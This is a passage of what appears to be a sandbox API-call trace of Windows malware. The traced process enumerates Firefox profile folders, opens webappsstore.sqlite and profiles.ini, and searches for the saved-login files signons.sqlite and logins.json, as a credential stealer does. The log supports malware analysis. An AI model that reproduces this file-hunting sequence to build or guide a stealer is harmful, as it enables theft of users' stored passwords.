lpFindFileData=0x52d860) returned 0 [0589.649] FindClose (in: hFindFile=0x5b9b50 | out: hFindFile=0x5b9b50) returned 1 [0589.649] LocalFree (hMem=0x578c30) returned 0x0 [0589.649] LocalFree (hMem=0x5e1d10) returned 0x0 [0589.649] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dad8 | out: lpFindFileData=0x52dad8) returned 1 [0589.649] lstrcmpiW (lpString1="webapps", lpString2=".") returned 1 [0589.649] lstrcmpiW (lpString1="webapps", lpString2="..") returned 1 [0589.649] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.649] lstrlenW (lpString="\\") returned 1 [0589.649] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.649] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c30 [0589.649] lstrlenW (lpString="webapps") returned 7 [0589.649] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.649] LocalAlloc (uFlags=0x40, uBytes=0x128) returned 0x5e1d10 [0589.649] LocalFree (hMem=0x578c30) returned 0x0 [0589.649] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps") returned 83 [0589.649] lstrlenW (lpString="\\*.*") returned 4 [0589.649] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps") returned 83 [0589.649] LocalAlloc (uFlags=0x40, uBytes=0x130) returned 0x578c30 [0589.649] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\*.*", lpFindFileData=0x52d860 | out: lpFindFileData=0x52d860) returned 0x5b9b50 [0589.649] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0589.649] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d860 | out: lpFindFileData=0x52d860) returned 1 [0589.649] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0589.649] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0589.649] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d860 | out: lpFindFileData=0x52d860) returned 1 [0589.649] lstrlenW (lpString="\\") returned 1 [0589.649] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps") returned 83 [0589.649] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x5e1e40 [0589.650] lstrlenW (lpString="webapps.json") returned 12 [0589.650] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\") returned 84 [0589.650] LocalAlloc (uFlags=0x40, uBytes=0x142) returned 0x5a2988 [0589.650] LocalFree (hMem=0x5e1e40) returned 0x0 [0589.650] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\webapps.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\webapps\\webapps.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x66c [0589.650] CloseHandle (hObject=0x66c) returned 1 [0589.650] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\webapps.json", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x61 [0589.650] LocalAlloc (uFlags=0x40, uBytes=0x142) returned 0x5e1e40 [0589.650] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\webapps.json", lpDst=0x5e1e40, nSize=0x61 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\webapps.json") returned 0x61 [0589.650] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\webapps.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\webapps\\webapps.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x66c [0589.650] CloseHandle (hObject=0x66c) returned 1 [0589.650] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\webapps.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\webapps\\webapps.json"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x66c [0589.650] GetFileSize (in: hFile=0x66c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2 [0589.650] CreateFileMappingW (hFile=0x66c, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4e0 [0589.650] MapViewOfFile (hFileMappingObject=0x4e0, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0589.650] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0589.650] CloseHandle (hObject=0x4e0) returned 1 [0589.650] CloseHandle (hObject=0x66c) returned 1 [0589.650] LocalFree (hMem=0x5e1e40) returned 0x0 [0589.650] LocalFree (hMem=0x5a2988) returned 0x0 [0589.651] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d860 | out: lpFindFileData=0x52d860) returned 0 [0589.651] FindClose (in: hFindFile=0x5b9b50 | out: hFindFile=0x5b9b50) returned 1 [0589.651] LocalFree (hMem=0x578c30) returned 0x0 [0589.651] LocalFree (hMem=0x5e1d10) returned 0x0 [0589.651] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dad8 | out: lpFindFileData=0x52dad8) returned 1 [0589.651] lstrlenW (lpString="\\") returned 1 [0589.651] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.651] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c30 [0589.651] lstrlenW (lpString="webappsstore.sqlite") returned 19 [0589.651] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.651] LocalAlloc (uFlags=0x40, uBytes=0x140) returned 0x56afc8 [0589.651] LocalFree (hMem=0x578c30) returned 0x0 [0589.651] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webappsstore.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\webappsstore.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.651] CloseHandle (hObject=0x668) returned 1 [0589.651] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webappsstore.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x60 [0589.651] LocalAlloc (uFlags=0x40, uBytes=0x140) returned 0x56c300 [0589.651] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webappsstore.sqlite", lpDst=0x56c300, nSize=0x60 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webappsstore.sqlite") returned 0x60 [0589.651] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webappsstore.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\webappsstore.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.651] CloseHandle (hObject=0x668) returned 1 [0589.651] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webappsstore.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\webappsstore.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.651] GetFileSize (in: hFile=0x668, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x18000 [0589.651] CreateFileMappingW (hFile=0x668, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x66c [0589.651] MapViewOfFile (hFileMappingObject=0x66c, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0589.652] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0589.652] CloseHandle (hObject=0x66c) returned 1 [0589.652] CloseHandle (hObject=0x668) returned 1 [0589.653] LocalFree (hMem=0x56c300) returned 0x0 [0589.653] LocalFree (hMem=0x56afc8) returned 0x0 [0589.653] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dad8 | out: lpFindFileData=0x52dad8) returned 0 [0589.653] FindClose (in: hFindFile=0x57c9a0 | out: hFindFile=0x57c9a0) returned 1 [0589.653] LocalFree (hMem=0x59a8a0) returned 0x0 [0589.653] LocalFree (hMem=0x578b10) returned 0x0 [0589.653] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd50 | out: lpFindFileData=0x52dd50) returned 0 [0589.653] FindClose (in: hFindFile=0x57ca60 | out: hFindFile=0x57ca60) returned 1 [0589.653] LocalFree (hMem=0x5500d0) returned 0x0 [0589.653] LocalFree (hMem=0x5a1300) returned 0x0 [0589.653] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfc8 | out: lpFindFileData=0x52dfc8) returned 1 [0589.653] lstrlenW (lpString="\\") returned 1 [0589.653] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 50 [0589.653] LocalAlloc (uFlags=0x40, uBytes=0xe8) returned 0x2ed3050 [0589.653] lstrlenW (lpString="profiles.ini") returned 12 [0589.653] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\\\") returned 51 [0589.653] LocalAlloc (uFlags=0x40, uBytes=0x100) returned 0x5a1300 [0589.653] LocalFree (hMem=0x2ed3050) returned 0x0 [0589.653] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\\\profiles.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles.ini"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0589.653] CloseHandle (hObject=0x4c8) returned 1 [0589.653] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\\\profiles.ini", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x40 [0589.653] LocalAlloc (uFlags=0x40, uBytes=0x100) returned 0x5500d0 [0589.653] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\\\profiles.ini", lpDst=0x5500d0, nSize=0x40 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\\\profiles.ini") returned 0x40 [0589.653] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\\\profiles.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles.ini"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0589.653] CloseHandle (hObject=0x4c8) returned 1 [0589.653] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\\\profiles.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0589.653] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6f [0589.653] CreateFileMappingW (hFile=0x4c8, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x660 [0589.653] MapViewOfFile (hFileMappingObject=0x660, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0589.654] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57c650 [0589.654] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0589.654] CloseHandle (hObject=0x660) returned 1 [0589.654] CloseHandle (hObject=0x4c8) returned 1 [0589.654] LocalFree (hMem=0x5500d0) returned 0x0 [0589.654] StrStrIW (lpFirst="profiles.ini", lpSrch="signons.sqlite") returned 0x0 [0589.654] StrStrIW (lpFirst="profiles.ini", lpSrch="logins.json") returned 0x0 [0589.654] LocalFree (hMem=0x5a1300) returned 0x0 [0589.654] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfc8 | out: lpFindFileData=0x52dfc8) returned 0 [0589.654] FindClose (in: hFindFile=0x57d1e0 | out: hFindFile=0x57d1e0) returned 1 [0589.654] LocalFree (hMem=0x5d7c90) returned 0x0 [0589.654] LocalFree (hMem=0x2ed2ba0) returned 0x0 [0589.654] LocalFree (hMem=0x2ed2150) returned 0x0 [0589.654] LocalFree (hMem=0x2ed2060) returned 0x0 [0589.654] LocalAlloc (uFlags=0x40, uBytes=0x1080) returned 0x5ec290 [0589.654] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\Main", phkResult=0x52e270 | out: phkResult=0x52e270*=0x5ac) returned 0x0 [0589.655] RegEnumKeyExW (in: hKey=0x5ac, dwIndex=0x0, lpName=0x5ec290, lpcchName=0x52e26c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x52e26c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0589.655] RegCloseKey (hKey=0x5ac) returned 0x0 [0589.655] LocalFree (hMem=0x5ec290) returned 0x0 [0589.655] LocalFree (hMem=0x2ed2ab0) returned 0x0 [0589.655] RegEnumKeyExW (in: hKey=0x664, dwIndex=0x1, lpName=0x5eb208, lpcchName=0x52e2a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Uninstall", lpcchName=0x52e2a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0589.655] lstrlenW (lpString="\\") returned 1 [0589.655] lstrlenW (lpString="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)") returned 45 [0589.655] LocalAlloc (uFlags=0x40, uBytes=0xde) returned 0x2ed0148 [0589.655] lstrlenW (lpString="Uninstall") returned 9 [0589.655] lstrlenW (lpString="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\") returned 46 [0589.655] LocalAlloc (uFlags=0x40, uBytes=0xf0) returned 0x5d7c90 [0589.655] LocalFree (hMem=0x2ed0148) returned 0x0 [0589.655] StrStrIW (lpFirst="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\Uninstall", lpSrch="Firefox") returned="Firefox\\25.0 (en-US)\\Uninstall" [0589.655] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\Uninstall", ulOptions=0x0, samDesired=0x20019, phkResult=0x52e248 | out: phkResult=0x52e248*=0x5ac) returned 0x0 [0589.655] RegQueryValueExW (in: hKey=0x5ac, lpValueName="PathToExe", lpReserved=0x0, lpType=0x52e230, lpData=0x0, lpcbData=0x52e244*=0x0 | out: lpType=0x52e230*=0x0, lpData=0x0, lpcbData=0x52e244*=0x0) returned 0x2 [0589.655] RegCloseKey (hKey=0x5ac) returned 0x0 [0589.655] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\Uninstall", ulOptions=0x0, samDesired=0x20219, phkResult=0x52e21c | out: phkResult=0x52e21c*=0x5ac) returned 0x0 [0589.655] RegQueryValueExW (in: hKey=0x5ac, lpValueName="PathToExe", lpReserved=0x0, lpType=0x52e204, lpData=0x0, lpcbData=0x52e218*=0x0 | out: lpType=0x52e204*=0x0, lpData=0x0, lpcbData=0x52e218*=0x0) returned 0x2 [0589.655] RegCloseKey (hKey=0x5ac) returned 0x0 [0589.655] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\Uninstall", ulOptions=0x0, samDesired=0x20119, phkResult=0x52e1f0 | out: phkResult=0x52e1f0*=0x0) returned 0x2 [0589.655] LocalAlloc (uFlags=0x40, uBytes=0x1080) returned 0x5ec290 [0589.655] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\Uninstall", phkResult=0x52e270 | out: phkResult=0x52e270*=0x5ac) returned 0x0 [0589.655] RegEnumKeyExW (in: hKey=0x5ac, dwIndex=0x0, lpName=0x5ec290, lpcchName=0x52e26c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x52e26c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0589.655] RegCloseKey (hKey=0x5ac) returned 0x0 [0589.655] LocalFree (hMem=0x5ec290) returned 0x0 [0589.655] LocalFree (hMem=0x5d7c90) returned 0x0 [0589.655] RegEnumKeyExW (in: hKey=0x664, dwIndex=0x2, lpName=0x5eb208, lpcchName=0x52e2a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Uninstall", lpcchName=0x52e2a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0589.655] RegCloseKey (hKey=0x664) returned 0x0 [0589.655] LocalFree (hMem=0x5eb208) returned 0x0 [0589.655] LocalFree (hMem=0x2ed0060) returned 0x0 [0589.655] RegEnumKeyExW (in: hKey=0x4d0, dwIndex=0x1, lpName=0x5e6108, lpcchName=0x52e2e4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="25.0 (en-US)", lpcchName=0x52e2e4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0589.656] RegCloseKey (hKey=0x4d0) returned 0x0 [0589.656] LocalFree (hMem=0x5e6108) returned 0x0 [0589.656] LocalFree (hMem=0x5d73b0) returned 0x0 [0589.656] RegEnumKeyExW (in: hKey=0x2e4, dwIndex=0x2, lpName=0x5e5080, lpcchName=0x52e320, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Mozilla Firefox 25.0", lpcchName=0x52e320, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0589.656] lstrlenW (lpString="\\") returned 1 [0589.656] lstrlenW (lpString="Software\\Mozilla") returned 16 [0589.656] LocalAlloc (uFlags=0x40, uBytes=0xa4) returned 0x5d3958 [0589.656] lstrlenW (lpString="Mozilla Firefox 25.0") returned 20 [0589.656] lstrlenW (lpString="Software\\Mozilla\\") returned 17 [0589.656] LocalAlloc (uFlags=0x40, uBytes=0xcc) returned 0x5977a0 [0589.656] LocalFree (hMem=0x5d3958) returned 0x0 [0589.656] StrStrIW (lpFirst="Software\\Mozilla\\Mozilla Firefox 25.0", lpSrch="Firefox") returned="Firefox 25.0" [0589.656] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox 25.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x52e2c0 | out: phkResult=0x52e2c0*=0x4d0) returned 0x0 [0589.656] RegQueryValueExW (in: hKey=0x4d0, lpValueName="PathToExe", lpReserved=0x0, lpType=0x52e2a8, lpData=0x0, lpcbData=0x52e2bc*=0x0 | out: lpType=0x52e2a8*=0x0, lpData=0x0, lpcbData=0x52e2bc*=0x0) returned 0x2 [0589.656] RegCloseKey (hKey=0x4d0) returned 0x0 [0589.656] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox 25.0", ulOptions=0x0, samDesired=0x20219, phkResult=0x52e294 | out: phkResult=0x52e294*=0x4d0) returned 0x0 [0589.656] RegQueryValueExW (in: hKey=0x4d0, lpValueName="PathToExe", lpReserved=0x0, lpType=0x52e27c, lpData=0x0, lpcbData=0x52e290*=0x0 | out: lpType=0x52e27c*=0x0, lpData=0x0, lpcbData=0x52e290*=0x0) returned 0x2 [0589.656] RegCloseKey (hKey=0x4d0) returned 0x0 [0589.656] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox 25.0", ulOptions=0x0, samDesired=0x20119, phkResult=0x52e268 | out: phkResult=0x52e268*=0x0) returned 0x2 [0589.656] LocalAlloc (uFlags=0x40, uBytes=0x1080) returned 0x5e6108 [0589.656] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox 25.0", phkResult=0x52e2e8 | out: phkResult=0x52e2e8*=0x4d0) returned 0x0 [0589.656] RegEnumKeyExW (in: hKey=0x4d0, dwIndex=0x0, lpName=0x5e6108, lpcchName=0x52e2e4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="bin", lpcchName=0x52e2e4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0589.656] lstrlenW (lpString="\\") returned 1 [0589.656] lstrlenW (lpString="Software\\Mozilla\\Mozilla Firefox 25.0") returned 37 [0589.656] LocalAlloc (uFlags=0x40, uBytes=0xce) returned 0x597878 [0589.656] lstrlenW (lpString="bin") returned 3 [0589.656] lstrlenW (lpString="Software\\Mozilla\\Mozilla Firefox 25.0\\") returned 38 [0589.656] LocalAlloc (uFlags=0x40, uBytes=0xd4) returned 0x5dbdf0 [0589.656] LocalFree (hMem=0x597878) returned 0x0 [0589.656] StrStrIW (lpFirst="Software\\Mozilla\\Mozilla Firefox 25.0\\bin", lpSrch="Firefox") returned="Firefox 25.0\\bin" [0589.656] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox 25.0\\bin", ulOptions=0x0, samDesired=0x20019, phkResult=0x52e284 | out: phkResult=0x52e284*=0x664) returned 0x0 [0589.656] RegQueryValueExW (in: hKey=0x664, lpValueName="PathToExe", lpReserved=0x0, lpType=0x52e26c, lpData=0x0, lpcbData=0x52e280*=0x0 | out: lpType=0x52e26c*=0x1, lpData=0x0, lpcbData=0x52e280*=0x66) returned 0x0 [0589.656] LocalAlloc (uFlags=0x40, uBytes=0xe8) returned 0x2ed2ab0 [0589.657] RegQueryValueExW (in: hKey=0x664, lpValueName="PathToExe", lpReserved=0x0, lpType=0x0, lpData=0x2ed2ab0, lpcbData=0x52e280*=0x66 | out: lpType=0x0, lpData=0x2ed2ab0*=0x43, lpcbData=0x52e280*=0x66) returned 0x0 [0589.657] RegCloseKey (hKey=0x664) returned 0x0 [0589.657] lstrlenW (lpString="C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe") returned 50 [0589.657] lstrlenW (lpString="") returned 0 [0589.657] lstrlenW (lpString="C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe") returned 50 [0589.657] LocalAlloc (uFlags=0x40, uBytes=0xe6) returned 0x2ed2060 [0589.657] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe", lpSrch=".exe") returned=".exe" [0589.657] StrRChrIW (lpStart="C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe", lpEnd=0x0, wMatch=0x5c) returned="\\firefox.exe" [0589.657] lstrlenW (lpString="C:\\Program Files (x86)\\Mozilla Firefox") returned 38 [0589.657] LocalAlloc (uFlags=0x40, uBytes=0x28a) returned 0x578b10 [0589.657] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x578b10 | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 0x0 [0589.657] lstrlenW (lpString="\\Mozilla\\Firefox\\") returned 17 [0589.657] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 33 [0589.657] LocalAlloc (uFlags=0x40, uBytes=0xe6) returned 0x2ed2150 [0589.657] LocalFree (hMem=0x578b10) returned 0x0 [0589.657] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox")) returned 0x2010 [0589.657] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox" (normalized: "c:\\program files (x86)\\mozilla firefox")) returned 0x10 [0589.657] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 50 [0589.657] lstrlenW (lpString="") returned 0 [0589.657] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 50 [0589.657] LocalAlloc (uFlags=0x40, uBytes=0xe6) returned 0x2ed2ba0 [0589.657] lstrlenW (lpString="profiles.ini") returned 12 [0589.657] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 50 [0589.657] LocalAlloc (uFlags=0x40, uBytes=0xfe) returned 0x5d7c90 [0589.657] LocalAlloc (uFlags=0x40, uBytes=0xfe6a) returned 0x2ed9848 [0589.657] LocalAlloc (uFlags=0x40, uBytes=0x1080) returned 0x5eb208 [0589.657] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles.ini"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x664 [0589.657] CloseHandle (hObject=0x664) returned 1 [0589.658] GetPrivateProfileSectionNamesW (in: lpszReturnBuffer=0x2ed9848, nSize=0xfde8, lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini" | out: lpszReturnBuffer="General") returned 0x11 [0589.658] StrStrIW (lpFirst="General", lpSrch="Profile") returned 0x0 [0589.658] lstrlenW (lpString="General") returned 7 [0589.658] StrStrIW (lpFirst="Profile0", lpSrch="Profile") returned="Profile0" [0589.658] GetPrivateProfileStringW (in: lpAppName="Profile0", lpKeyName="Path", lpDefault="", lpReturnedString=0x5eb208, nSize=0xfff, lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini" | out: lpReturnedString="Profiles/3y2joh8o.default") returned 0x19 [0589.659] GetPrivateProfileIntW (lpAppName="Profile0", lpKeyName="IsRelative", nDefault=1, lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini") returned 0x1 [0589.660] lstrlenW (lpString="Profiles/3y2joh8o.default") returned 25 [0589.660] lstrlenW 